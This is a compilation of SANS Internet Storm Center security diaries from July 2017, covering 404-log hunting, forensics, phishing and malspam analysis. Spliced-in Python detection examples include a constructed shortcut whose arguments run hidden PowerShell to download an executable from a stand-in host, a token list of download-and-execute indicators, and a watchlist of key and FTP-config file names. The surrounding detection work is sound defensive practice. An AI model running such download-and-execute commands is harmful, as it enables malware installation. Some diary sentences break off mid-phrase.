Security

ISC Stormcast For Friday, July 21st 2017 https://isc.sans.edu/podcastdetail.html?id=5592, (Fri, Jul 21st)

SANS Internet Storm Center - July 21, 2017 - 1:15am
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security

ISC Stormcast For Thursday, July 20th 2017 https://isc.sans.edu/podcastdetail.html?id=5590, (Thu, Jul 20th)

SANS Internet Storm Center - July 20, 2017 - 1:05am
Categories: Security

Bots Searching for Keys & Config Files, (Wed, Jul 19th)

SANS Internet Storm Center - July 19, 2017 - 7:26am

If you don't know our 404 project [1], I would definitely recommend having a look at it! The idea is to track HTTP 404 errors returned by your web servers. I like to compare the value of 404 errors found in web site log files to dropped events in firewall logs: they can be very useful for detecting ongoing attacks or attackers performing reconnaissance. Reviewing 404 errors is one task on my daily hunting to-do list, but it may quickly become unmanageable if you have many websites or popular ones. The idea is to focus on rare events that would usually pass below the radar. Here is a Splunk query that I use:

    index=web sourcetype=access_combined status=404 | rex field=uri "(?<new_uri>^\/{1}[a-zA-Z0-9_\-\~]+\.\w+$)" | cluster showcount=true t=0.6 field=new_uri | table _time, cluster_count, cluster_label, new_uri | sort cluster_count

What does it do?

  • It searches for 404 errors in all the indexed Apache logs (access_combined).
  • It extracts interesting URIs. I'm only interested in files from the root directory, e.g. GET /name.extension (the regular expression rejects anything in a sub-directory).
  • It creates clusters of similar URIs, counts the members of each cluster and sorts the rarest first.

Here is an example of the output (CSV):

    _time,cluster_count,cluster_label,new_uri
    2017-07-18T13:42:15.000+0200,1,9,/xml.log
    2017-07-18T13:18:51.000+0200,1,11,/rules.abe
    2017-07-18T11:51:57.000+0200,1,17,/tmp2017.do
    2017-07-18T11:51:56.000+0200,1,18,/tmp2017.action
    2017-07-18T09:16:52.000+0200,1,23,/db_z.php
    2017-07-18T07:28:29.000+0200,1,25,/readme.txt
    2017-07-18T03:44:07.000+0200,1,27,/sloth_webmaster.php
    2017-07-18T02:52:33.000+0200,1,28,/sitemap.xml
    2017-07-18T00:10:57.000+0200,1,29,/license.php
    2017-07-18T00:00:32.000+0200,1,30,/How_I_Met_Your_Pointer.pdf
    2017-07-17T22:57:41.000+0200,1,31,/browserconfig.xml
    2017-07-17T20:02:01.000+0200,1,76,/rootshellbe.zip
    2017-07-17T20:01:00.000+0200,1,82,/htdocs.zip
    2017-07-17T20:00:54.000+0200,1,83,/a.zip
    2017-07-17T20:00:51.000+0200,1,84,/wwwroot1.zip
    2017-07-17T20:00:50.000+0200,1,85,/wwwroot1.rar
    2017-07-17T19:59:34.000+0200,1,98,/rootshell.zip
    2017-07-17T19:59:27.000+0200,1,103,/blogrootshellbe.rar
    2017-07-17T19:59:18.000+0200,1,104,/rootshellbe.rar

Many tested files are basically backup files, like I already mentioned in a previous diary [2]; nothing changed. But yesterday I found a bot searching for even more interesting files: configuration files from popular tools and website private keys. Indeed, file transfer tools are used by many webmasters to deploy files on web servers, and they could theoretically

  • /filezilla.xml
  • /ws_ftp.ini
  • /winscp.ini
  • /backup.sql
  • /sitename.key
  • /key.pem
  • /myserver.key
  • /privatekey.key
  • /server.key
  • /journal.mdb
  • /ftp.txt
  • /rules.abe

Each file was searched with a different combination of lower/upper case characters. Note the presence of rules.abe, which is used by webmasters to specify rules for some web applications [3]. This file could contain references to hidden applications (which is interesting to know for an attacker).
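As an added example (not from the diary), here is the same hunt in Python over Apache access_combined lines: it extracts root-level file names from 404s exactly as the diary's rex does, folds case because the bot above tried each name in varied case, sorts the rarest first, and checks the names against the list of config files and keys the bot probed for. The log lines and IP addresses are constructed.

```python
"""Rare-404 hunt over Apache access_combined lines, mirroring the diary's Splunk
query. Added example, not from the diary; SAMPLE_LOG below is constructed."""
import re
from collections import Counter

# client ident user [timestamp] "METHOD uri proto" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+)[^"]*" (?P<status>\d{3}) ')
# Same restriction as the diary's rex: one file directly under the web root
ROOT_FILE_RE = re.compile(r'^/[a-zA-Z0-9_\-~]+\.\w+$')

# Names the diary saw a bot probing for (FTP client configs, keys, dumps)
WATCHLIST = {"/filezilla.xml", "/ws_ftp.ini", "/winscp.ini", "/backup.sql",
             "/sitename.key", "/key.pem", "/myserver.key", "/privatekey.key",
             "/server.key", "/journal.mdb", "/ftp.txt", "/rules.abe"}


def extract_root_404s(lines):
    """Count 404s per root-level file name, case-folded because the bot tried
    each name in different upper/lower-case combinations.
    Returns (counts, first_seen) with first_seen[name] = (timestamp, ip, uri)."""
    counts, first_seen = Counter(), {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m.group("status") != "404":
            continue
        uri = m.group("uri").split("?", 1)[0]        # drop any query string
        if not ROOT_FILE_RE.match(uri):
            continue                                  # sub-directory: ignore
        key = uri.lower()
        counts[key] += 1
        first_seen.setdefault(key, (m.group("ts"), m.group("ip"), uri))
    return counts, first_seen


def rare_404s(lines, max_count=1):
    """Rarest names first: these are the ones that pass below the radar."""
    counts, first_seen = extract_root_404s(lines)
    rows = [(c, name) + first_seen[name]
            for name, c in counts.items() if c <= max_count]
    return sorted(rows)


def watchlist_hits(lines):
    """Watch-listed names that were requested at all, with request counts."""
    counts, _ = extract_root_404s(lines)
    return sorted((name, c) for name, c in counts.items() if name in WATCHLIST)


# Constructed access_combined lines (documentation-range IPs, made-up times)
SAMPLE_LOG = [
    '203.0.113.5 - - [18/Jul/2017:13:42:15 +0200] "GET /xml.log HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [18/Jul/2017:09:16:52 +0200] "GET /FileZilla.XML HTTP/1.1" 404 209 "-" "python-requests/2.18.1"',
    '198.51.100.7 - - [18/Jul/2017:09:16:53 +0200] "GET /filezilla.xml HTTP/1.1" 404 209 "-" "python-requests/2.18.1"',
    '198.51.100.7 - - [18/Jul/2017:09:16:54 +0200] "GET /ws_ftp.ini HTTP/1.1" 404 209 "-" "python-requests/2.18.1"',
    '192.0.2.9 - - [18/Jul/2017:10:00:01 +0200] "GET /index.html HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [18/Jul/2017:10:00:02 +0200] "GET /images/logo.png HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [18/Jul/2017:10:00:03 +0200] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [18/Jul/2017:10:05:03 +0200] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [18/Jul/2017:10:07:03 +0200] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [17/Jul/2017:19:59:34 +0200] "GET /rootshell.zip?x=1 HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for row in rare_404s(SAMPLE_LOG):
        print(row)
    print("watchlist:", watchlist_hits(SAMPLE_LOG))
```

Raise max_count on busy sites; the watch-list check is the cheap complement that catches a probe even when it is repeated often enough to stop being rare.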

So, keep an eye on your 404 errors and happy hunting!

[1] https://isc.sans.edu/404project/
[2] https://isc.sans.edu/forums/diary/Backup+Files+Are+Good+but+Can+Be+Evil/21935
[3] https://noscript.net/abe/web-authors.html

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

Categories: Security

ISC Stormcast For Wednesday, July 19th 2017 https://isc.sans.edu/podcastdetail.html?id=5588, (Wed, Jul 19th)

SANS Internet Storm Center - July 19, 2017 - 1:15am
Categories: Security

Investigation of BitTorrent Sync (v.2.0) as a P2P Cloud Service (Part 4 - Windows Thumbnail Cache, Registry, Prefetch Files, and Link Files artefacts), (Tue, Jul 18th)

SANS Internet Storm Center - July 18, 2017 - 8:39am

[This is the fourth guest diary by Dr. Ali Dehghantanha. Previous diaries in the series are: (links not preserved in this copy). If you would like to propose a guest diary, please let us know]

Continuing earlier posts on investigation of BitTorrent Sync version 2.0, this post explains remaining artefacts of user activities from Thumbnail Cache, Registry, Prefetch Files, and Link Files.

Thumbnail cache

Analysis of the Windows thumbcache (stored under %AppData%\Local\Microsoft\Windows\Explorer) recovered copies of thumbnail images for the BitTorrent Sync client application and its download site (e.g., the BitTorrent Sync logo and image icons), indicative of BitTorrent Sync usage. Examination of the thumbnail cache from the file synchronisation only revealed copies of thumbnail images for the synced files from the Windows 8.1 and Mac OS VMs. We could discern the thumbnail cache from the folder table field (of the files table), which made reference to BitTorrent Sync (see Figure 1), and the date of a sync file or folder.

Figure 1: Thumbnail information recovered from the index.sqlite database of Mac OS thumbcache folder.

Windows Registry

Analysis of the HKLM hive determined that the BitTorrent Sync installation could be detected from the presence of the HKLM\SOFTWARE\BitTorrent\Sync key, and the installation path could be discerned from its SyncPath subkey. In addition, the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\BitTorrent Sync key could provide supporting information about the installation, such as the display icon path, display name, BitTorrent Sync version installed, installation and uninstaller paths, and other entries of relevance. As with any other Windows application, when the BitTorrent Sync client application is started there is a full path reference to the BitTorrent Sync executable in HKU\SID\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache, indicative of recent BitTorrent Sync usage. Further evidence of client application usage could be ascertained from the occurrence of the entry BitTorrent Sync: %Program Files%\BitTorrent Sync\BitTorrent Sync.exe /MINIMIZED, alongside the last executed time, in Software\Microsoft\Windows\CurrentVersion\Run. Another registry key of forensic interest is Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32, which keeps track of a list of filename references (e.g., filenames for the executable and synced files) associated with the BitTorrent Sync client application, as well as timestamp information for the last usage. According to Carvey (2014), the CIDSizeMRU subkey (MRU is the abbreviation for Most-Recently-Used) maintains a list of recently used applications, the OpenSaveMRU subkey records the list of files that have been opened or saved within a Windows shell dialog box, and the LastVisitedMRU subkey tracks the specific executable files used by an application to open the files documented in the OpenSaveMRU subkey.

Other evidence indicating BitTorrent Sync client application usage includes the presence of entries referencing the link file, as well as the last executed time, in Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist.

Prefetch files

Examination of the prefetch files located two prefetch files for BitTorrent Sync, namely BITTORRENT_SYNC.EXE.pf and BITTORRENT SYNC.exe.pf. The information of forensic interest recoverable from these files includes the executable path, the number of times the application has been loaded, and the last run time, all of which are useful to supplement timeline analysis. However, no prefetch instance was located for the synced files in our experiments. The persistence of the prefetch files after uninstallation implies that BitTorrent Sync references will remain in the prefetch files to indicate its use on the client device.

Link files

Link (.lnk) files are shortcut metadata files used by Windows to maintain a list of linked paths relating to a file (commonly the paths where the original files are located), associated timestamps (created, written, and last accessed times), and file sizes (original and modified), which are useful to identify the origin of a file. An inspection of the directory listings located link files for %Program Files (x86)%\BitTorrent Sync\BitTorrent Sync.exe at %Users%\Public\Desktop\BitTorrent Sync.lnk and %Program Data%\Microsoft\Windows\Start Menu\BitTorrent Sync.lnk, and their presence may be indicative of a BitTorrent Sync installation.

--
Bojan
@bojanz

Categories: Security

ISC Stormcast For Tuesday, July 18th 2017 https://isc.sans.edu/podcastdetail.html?id=5586, (Tue, Jul 18th)

SANS Internet Storm Center - July 18, 2017 - 1:50am
Categories: Security

ISC Stormcast For Monday, July 17th 2017 https://isc.sans.edu/podcastdetail.html?id=5584, (Mon, Jul 17th)

SANS Internet Storm Center - July 17, 2017 - 1:45am
Categories: Security

SMS Phishing induces victims to photograph its own token card, (Sun, Jul 16th)

SANS Internet Storm Center - July 17, 2017 - 1:16am

Introduction

Today I faced quite an unusual SMS phishing campaign here in Brazil. A friend of mine received an SMS message supposedly sent by his bank asking him to update his registration data through the given URL; otherwise, his account could be blocked, as seen in Figure 1.


Figure 1 SMS message received

To tell you the truth, my friend doesn't have any account at the bank in question and, even so, we know that those kinds of messages are hardly ever sent by banks and are, most of the time, related to malware propagation and information stealing. However, instead of discarding the message, we decided to give it a try, and the results, as you are going to read in this diary, surprised us. This campaign involves no malware propagation, just creativity in favor of evil.

SMS Phishing analysis

The link in the message aims to take the victim to a fake and very simplistic mobile version of a well-known bank website. First, it asks for the CPF (a kind of social security card number) and a password, as seen in Figure 2.


Figure 2 Fake bank website asking for CPF and password

It is interesting to note that there is data input validation. The user must obey the CPF number composition rules, otherwise he can

Figure 3 CPF validation rules

This kind of validation is certainly used to give a bit of legitimacy to the fake website and, perhaps, not to overload the crooks with too much data-mining work.

In the next page, the fake website informs that the device used on that connection needs to be authorized, as seen in Figure 4.


Figure 4 Fake website: user must authorize the device

By clicking on Habilitar Aparelho, which means enable device, a new page is shown asking the victim to enter the 4-digit password, as seen in Figure 5.


Figure 5 Fake website asking for the 4-digit password

Again, there is minimal validation to prevent the user from trying very simple passwords like 1234.

Figure 6 4-digit password validation

Figure 7 Asking for the token card picture

Figure 7 Asking for the token card picture

By clicking on Finalizar Habilitação, which means proceed with the device authorization, the victim's smartphone will prompt the user to select a picture from its library or take a new one.

Figure 8 Taking the token card picture

Once the victim completes the whole process, including the token card picture, the criminals have all the information needed to make fraudulent transactions on the compromised bank account, and the user is forwarded to the real bank login page.

Final words

Using the victim's smartphone to take pictures in order to steal information or, who knows, things, scares me a little bit. I can explain. Earlier this month, reading Bruce Schneier's blog, I saw a post entitled Now It's Easier than Ever to Steal Someone's Keys [1], which says: The website key.me will make a duplicate key from a digital photo.

While writing this diary, I was told about similar SMS phishing campaigns targeting other banks' customers here in Brazil. Stay tuned.

References

[1] https://www.schneier.com/blog/archives/2017/07/now_its_easier_.html

--
Renato Marinho
Morphus Labs | LinkedIn |Twitter

Categories: Security

Office maldoc + .lnk, (Sat, Jul 15th)

SANS Internet Storm Center - July 15, 2017 - 9:38pm

Reader nik submitted a malicious document. (The screenshots of the document analysis were not preserved in this copy.)

And then we can use Woanware to analyse the .lnk file (screenshot not preserved).

Unfortunately, the .lnk file does not contain interesting metadata. But we can see that it uses PowerShell to download an executable from Dropbox.
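As an added example, not code from the diary or from Woanware, here is a minimal parser for the .lnk StringData fields that surfaces the command-line arguments a shortcut passes to its target, with a small heuristic for the PowerShell download pattern described above. build_lnk() constructs the sample shortcut inline (hypothetical target path and URL) so the parser can be exercised offline; real shortcuts usually also carry a LinkTargetIDList and LinkInfo, which the parser skips over.

```python
"""Minimal Shell Link (.lnk) triage: pull the command-line arguments a shortcut
passes to its target and flag the download-and-run pattern the diary describes.
Added example; the .lnk sample is constructed inline with build_lnk()."""
import struct

LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits from the [MS-SHLLINK] specification, section 2.1.1
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# StringData entries appear in this fixed order when their flag is set
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)

# Tokens a defender looks for in shortcut arguments (constructed heuristic)
SUSPICIOUS_TOKENS = ("powershell", "downloadfile", "downloadstring",
                     "invoke-webrequest", "iwr", "iex", "invoke-expression",
                     "-enc", "hidden", "bypass", "http://", "https://")


def _read_string(data, off, unicode_):
    """Read one StringData entry: u16 character count, then the characters."""
    (count,) = struct.unpack_from("<H", data, off)
    off += 2
    if unicode_:
        raw = data[off:off + 2 * count]
        return raw.decode("utf-16-le"), off + 2 * count
    raw = data[off:off + count]
    return raw.decode("cp1252", errors="replace"), off + count


def parse_lnk(data):
    """Return the StringData fields of a .lnk blob as a dict."""
    if (len(data) < LNK_HEADER_SIZE or data[:4] != b"\x4c\x00\x00\x00"
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link file")
    (flags,) = struct.unpack_from("<I", data, 0x14)
    off = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:        # skip the ItemID list
        (id_list_size,) = struct.unpack_from("<H", data, off)
        off += 2 + id_list_size
    if flags & HAS_LINK_INFO:                  # skip the LinkInfo structure
        (info_size,) = struct.unpack_from("<I", data, off)
        off += info_size
    unicode_ = bool(flags & IS_UNICODE)
    fields = {}
    for bit, name in STRING_FIELDS:
        if flags & bit:
            fields[name], off = _read_string(data, off, unicode_)
    return fields


def triage_lnk(data):
    """Parse a .lnk and list which suspicious tokens its target/arguments hit."""
    fields = parse_lnk(data)
    haystack = (fields.get("relative_path", "") + " "
                + fields.get("arguments", "")).lower()
    hits = [tok for tok in SUSPICIOUS_TOKENS if tok in haystack]
    return {"fields": fields, "indicators": hits, "suspicious": len(hits) >= 2}


def build_lnk(relative_path, arguments, working_dir=None, unicode_=True):
    """Construct a minimal .lnk (header + StringData only) for offline testing."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS
    if working_dir is not None:
        flags |= HAS_WORKING_DIR
    if unicode_:
        flags |= IS_UNICODE
    header = bytearray(LNK_HEADER_SIZE)
    header[0:4] = struct.pack("<I", LNK_HEADER_SIZE)
    header[4:20] = LNK_CLSID
    struct.pack_into("<I", header, 0x14, flags)
    struct.pack_into("<I", header, 0x3C, 1)    # ShowCommand = SW_SHOWNORMAL
    body = bytearray()
    for value in (relative_path, working_dir, arguments):   # spec order
        if value is None:
            continue
        raw = value.encode("utf-16-le") if unicode_ else value.encode("cp1252")
        body += struct.pack("<H", len(value)) + raw
    return bytes(header) + bytes(body)


# Constructed sample in the spirit of the diary's shortcut (hypothetical URL)
SAMPLE_TARGET = r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_ARGS = ('-WindowStyle Hidden -Command "Invoke-WebRequest '
               'https://example.invalid/update.exe -OutFile $env:TEMP\\u.exe"')
SAMPLE_LNK = build_lnk(SAMPLE_TARGET, SAMPLE_ARGS, working_dir=r"C:\Users\Public")

if __name__ == "__main__":
    result = triage_lnk(SAMPLE_LNK)
    print(result["fields"]["arguments"])
    print("indicators:", result["indicators"], "suspicious:", result["suspicious"])
```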

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

Categories: Security

NemucodAES and the malspam that distributes it, (Fri, Jul 14th)

SANS Internet Storm Center - July 14, 2017 - 4:44am

Introduction

During the past two weeks or so, I've noticed a significant increase in malicious spam (malspam) with attached zip archives disguised as delivery notices from the United Parcel Service (UPS). These zip archives contain JavaScript files designed to download and install NemucodAES ransomware and Kovter malware on a victim's Windows computer. My Online Security reported on this recent wave of malspam late last month, and it
Shown above: Example of an email from Thursday 2017-07-13.

Malspam with zip archives containing JavaScript files is easy for most organizations to detect. Yesterday, I visited one such organization, where someone showed me several of these messages blocked by mail filters and identified as malware. But most people have more pressing concerns; investigating blocked emails is pretty low on their list of priorities.

However, this is an ongoing concern, and the Nemucod ransomware currently pushed by this malspam is a new variant called NemucodAES. According to BleepingComputer, different researchers have identified and tracked this new variant. A decryptor for NemucodAES is currently available from Emsisoft.

Kovter is an older malware, but its also an ongoing concern. Together, these two pieces of malware could deliver a nasty punch. This diary reviews some emails and traffic from recent malspam pushing Kovter and NemucodAES.

History of Nemucod

Nemucod is a term for text-based script (usually a JavaScript file) that downloads and installs malware. By the last quarter of 2015, the term Nemucod was used by several security vendors to identify JavaScript-based Trojan downloaders. In several cases, Nemucod downloaded and installed ransomware binaries like TeslaCrypt. By March 2016, we started seeing reports of Nemucod ransomware that stopped downloading ransomware binaries in favor of using its own script-based ransomware component.

And now in July 2017, we see the next phase of Nemucod ransomware: NemucodAES. Emsisoft states this new variant is written in JavaScript and PHP. It uses AES and RSA to encrypt a victim's files.

History of Kovter

In 2013, Kovter acted as police ransomware that sat on a user's Windows host waiting for specific types of events to happen. An example? After getting infected with Kovter, if a victim started a file-sharing application, Kovter would generate a popup message stating he or she had violated the law. Then the infected host would demand the victim pay a fine.

By 2014, we started seeing Kovter identified as click-fraud malware. Click-fraud is when a person, computer program, or automated script generates network traffic by contacting numerous websites (or the same website numerous times). This simulates people clicking a web page or online advertisement. Advertisers are paid based on how many people click on their ads. Regular websites can charge more for ads based on how many people view the site.
Shown above: Example of click-fraud traffic caused by non-Kovter malware in May 2016, filtered in Wireshark.

By 2015, Kovter started hiding in the Windows registry to avoid detection. Kovters persistence in an infected Windows host consists of various elements. The end result? The initial executable deletes itself after infecting the Windows host, and Kovter effectively becomes a fileless infection.

Kovter hasn't changed much since I started documenting it in 2016. Post-infection traffic is remarkably similar from a sample I collected in January 2016 to the one from July 2017 discussed in this diary. I see a lot of post-infection events for Kovter command and control traffic. But I
Shown above: Kovter post-infection traffic from July 2017 filtered in Wireshark.

Kovter/NemucodAES malspam from July 2017

As mentioned earlier, this malspam has appeared daily during the past two weeks or so. I collected three for this diary:

  • Date/Time: Tuesday 2017-07-11 at 21:39 UTC
  • From: lprpxzt@host1.watutechnology.com
  • Subject: Status of your UPS delivery ID:008850576
  • Attachment: 008850576.zip

  • Date/Time: Wednesday 2017-07-12 at 23:26 UTC
  • From: test@server.profichi.com.ua
  • Subject: Problems with item delivery, n.5268714
  • Attachment: UPS-Package-5268714.zip

  • Date/Time: Thursday 2017-07-13 at 07:18 UTC
  • From: vtjobs@162-144-72-168.webhostbox.net
  • Subject: UPS parcel #08192149 delivery problem
  • Attachment: (name not preserved in this copy)

Shown above: Example of a malicious zip attachment and extracted .js file.

Infection traffic

Network traffic was typical for an infection by one of the .js files. We first see HTTP requests for the NemucodAES JavaScript, followed by requests for various executables. Then we see the post-infection Kovter traffic. NemucodAES doesn't
Shown above: Using Sguil, we can escalate the Kovter alerts and review them individually.

The infected Windows host

The infected Windows host opened a notification with the decryption instructions. Encrypted files retained their original file names (no added file extensions, as we often see with other ransomware). I found artifacts in the user's AppData\Local and AppData\Local\Temp directories. Some of these files are not inherently malicious: a legitimate PHP executable and DLL file were found in the user
Shown above: Artifacts from the user
Shown above: Artifacts from a folder in the user's AppData\Local directory.

Indicators of Compromise (IOCs)

The following IOCs are associated with the emails and infection on Thursday 2017-07-13:

Attached zip archives:

Extracted .js files:

Kovter executable (deletes itself after infection):

Domains used in the .js files and NemucodAES decryption instructions:


Kovter post-infection traffic:


Final words

Traffic and artifacts from this infection can be found here.

As mentioned earlier, with proper filtering, these emails are easily blocked. With proper network monitoring, traffic from an infection is easily detected. But some of these messages might slip past your filtering, and some people could possibly get infected. With the NemucodAES decryptor, people can recover their files, but I expect this ransomware will continue to evolve.

Has one of these messages hit your inbox? If so, please share your story in the comments section.

---
Brad Duncan
brad [at] malware-traffic-analysis.net

Categories: Security

ISC Stormcast For Friday, July 14th 2017 https://isc.sans.edu/podcastdetail.html?id=5582, (Thu, Jul 13th)

SANS Internet Storm Center - July 13, 2017 - 8:50pm
Categories: Security

Investigation of BitTorrent Sync (v.2.0) as a P2P Cloud Service (Part 3 - Physical Memory artefacts), (Thu, Jul 13th)

SANS Internet Storm Center - July 13, 2017 - 11:35am

[This is the third guest diary by Dr. Ali Dehghantanha. You can find his first diary here and second here. If you would like to propose a guest diary, please let us know]

Continuing my earlier posts on the investigation of BitTorrent Sync version 2.0, this post explains the remaining artefacts of user activities in the physical memory of Windows 8.1, Mac OS X Mavericks 10.9.5, and Ubuntu 14.04.1 LTS related to BitTorrent Sync version 2.0.

Analysis of the running processes using the pslist function of Volatility was able to recover the process name associated with the BitTorrent Sync client application (e.g., BitTorrent Sync.exe for Windows OS, BitTorrent Sync for Linux OS, and BitTorrent Sync for Mac OS). Examination of the network details using the netscan or netstat function of Volatility recovered the BitTorrent Sync network connections (see Figure 1).

Figure 1: An excerpt of BitTorrent Sync network information recovered using the netscan function of Volatility.

Undertaking data carving of the RAM captures and swap files determined that only the images used by the client application and synced files could be recovered. However, a search for the term btsync or bittorrent sync was able to recover the complete text of the log and metadata files of forensic interest (e.g., sync.log, sync.dat, history.dat, and settings.dat) in the RAM in plain text. In cases where the original file has been deleted, a Yarascan search for the text from the remnants could help attribute the remnants to the BitTorrent Sync process or other processes of relevance, to identify their origin. Figure 2 illustrates an occurrence of history.dat in the memory space of BitTorrent Sync.exe of the Windows 8.1 VM investigated.

Figure 2: Copy of history.dat file recovered from the memory space of BitTorrent Sync.exe.

The username (login email) and password for the Linux client application's web GUI can be detected following the strings username= and nwpwd= in the RAM, respectively. These appeared to be remnants from the form input field of the Linux client application; an example is shown in Figure 3. In addition, we also located several password hits in similar fragments containing the login email in the memory space of BitTorrent Sync.

Figure 3: Username and password recovered from the RAM of Ubuntu OS.

The next post will illustrate Windows Thumbnail Cache, Registry, Prefetch Files, and Link Files artefacts of BitTorrent v2.

Categories: Security

ISC Stormcast For Thursday, July 13th 2017 https://isc.sans.edu/podcastdetail.html?id=5580, (Wed, Jul 12th)

SANS Internet Storm Center - July 12, 2017 - 10:30pm
Categories: Security

Backup Scripts, the FIM of the Poor, (Wed, Jul 12th)

SANS Internet Storm Center - July 12, 2017 - 10:46am

File Integrity Management, or FIM, is an interesting security control that can help to detect unusual changes in a file system. For example, on a server there are directories that do not change often. Example with a UNIX environment:

  • Binaries libraries in /usr/lib, /usr/bin, /bin, /sbin, /usr/local/bin, ...
  • Configuration files in /etc
  • Devices files in /dev

Depending on the applications running on the server, we can also expect that static HTML content won't change often. The deployment of a file integrity management solution always has a cost, even if some solutions are available for free, like OSSEC [1].

Basically, to perform file integrity checks, the tool of your choice will read all the files from the file system, check if the content changed, then generate an event if the file has been altered. Wait, do we already have tools that do pretty much the same? Backup scripts, of course! To perform differential backups, they also have to scan the complete file system for changes. Why not use the output generated by those scripts to detect suspicious changes?

Plenty of backup scripts for UNIX rely on rsync [2], which is an amazing tool with interesting options. The verbosity is extremely modular. Of course, it can display the list of all files that have been added to the backup (read: that have been changed), but it can also output the file hashes by changing the output format with %C:

    # rsync --checksum --out-format="%n %C" ...

Note: this option is not available on all rsync versions; check yours.

Based on this rsync output, you can search for suspicious changes in sensitive directories like /etc (why did your /etc/passwd change since the last backup?) or look up the MD5 hashes of altered binaries against VT or any other database of IOCs. Keep this in mind!
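As an added example, not part of the diary, here is how the rsync output described above can be turned into a change report: it parses the %n %C lines, drops the files you expect to churn between backups, flags anything left under the sensitive directories listed above, and collects the hashes of altered binaries for an IOC lookup. The rsync output is constructed; note that --out-format only lists entries rsync actually transferred, so an incremental run already yields the change list.

```python
"""Use the output of `rsync --checksum --out-format="%n %C"` as a poor man's FIM.
Added example, not from the diary; SAMPLE_RSYNC_OUTPUT below is constructed."""
import re

# One rsync line per transferred entry: relative name, optionally a space and
# the full-file checksum. Directories and special files carry no checksum.
LINE_RE = re.compile(r'^(?P<name>.+?)(?: (?P<sum>[0-9a-f]{16,}))?\s*$')

# Directories that should rarely change on a server (the diary's list)
SENSITIVE_PREFIXES = ("etc/", "usr/lib/", "usr/bin/", "bin/", "sbin/",
                      "usr/local/bin/", "dev/")
# Where executable code lives: hashes from here are worth an IOC lookup
BINARY_PREFIXES = ("usr/lib/", "usr/bin/", "bin/", "sbin/", "usr/local/bin/")
# Files that legitimately churn between backups; tune per host
EXPECTED_CHURN = {"etc/mtab", "etc/resolv.conf", "etc/adjtime"}


def parse_rsync_output(text):
    """Map relative file name -> checksum (None when rsync printed none)."""
    files = {}
    for line in text.splitlines():
        line = line.rstrip()
        if not line or line.endswith("/"):       # blank line or directory entry
            continue
        m = LINE_RE.match(line)
        if m:
            files[m.group("name")] = m.group("sum")
    return files


def changed_sensitive(files, prefixes=SENSITIVE_PREFIXES, ignore=EXPECTED_CHURN):
    """(name, checksum) for transferred files under a sensitive prefix, minus
    the expected churn. Anything listed here deserves a look."""
    return sorted((n, c) for n, c in files.items()
                  if n.startswith(prefixes) and n not in ignore)


def hashes_to_lookup(files, prefixes=BINARY_PREFIXES):
    """Checksums of altered binaries/libraries, ready for a VT or IOC lookup."""
    return sorted(c for n, c in files.items() if c and n.startswith(prefixes))


def report(text):
    """Full pipeline over the output of one rsync run."""
    files = parse_rsync_output(text)
    return {"transferred": len(files),
            "sensitive": changed_sensitive(files),
            "lookup": hashes_to_lookup(files)}


# Constructed output of an incremental backup run (checksums are made up)
SAMPLE_RSYNC_OUTPUT = """\
etc/
etc/passwd 2f1b9e0c5d7a8e4f6b3c1a9d0e8f7a6b
etc/mtab 9c8d7e6f5a4b3c2d1e0f9a8b7c6d5e4f
usr/bin/ls 4e7d2c1b0a9f8e7d6c5b4a3f2e1d0c9b
usr/local/bin/my tool 7a6b5c4d3e2f1a0b9c8d7e6f5a4b3c2d
var/www/html/index.html 1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d
home/alice/notes.txt 0f9e8d7c6b5a4f3e2d1c0b9a8f7e6d5c
dev/null
"""

if __name__ == "__main__":
    for key, value in report(SAMPLE_RSYNC_OUTPUT).items():
        print(key, value)
```

A file under /etc that is neither expected churn nor explained by a package update is the event the diary wants you to notice; feed the hashes list to your IOC lookup of choice.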

[1] http://ossec-docs.readthedocs.io/en/latest/manual/syscheck/
[2] https://rsync.samba.org/

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

Categories: Security

July's Microsoft Patch Tuesday, (Tue, Jul 11th)

SANS Internet Storm Center - July 12, 2017 - 1:18am

Today's Microsoft Patch Tuesday fixes critical and important flaws that, if exploited, could give an attacker a range of possibilities, from privilege escalation to remote code execution (RCE), on different Windows OS and Microsoft Office versions.

One that caught my attention was the RCE affecting the Windows Search service [1], which may allow an unauthenticated attacker to take control of the target system through an SMB connection, giving him the possibility to install programs; view, change or delete data; or create new accounts with full user rights.

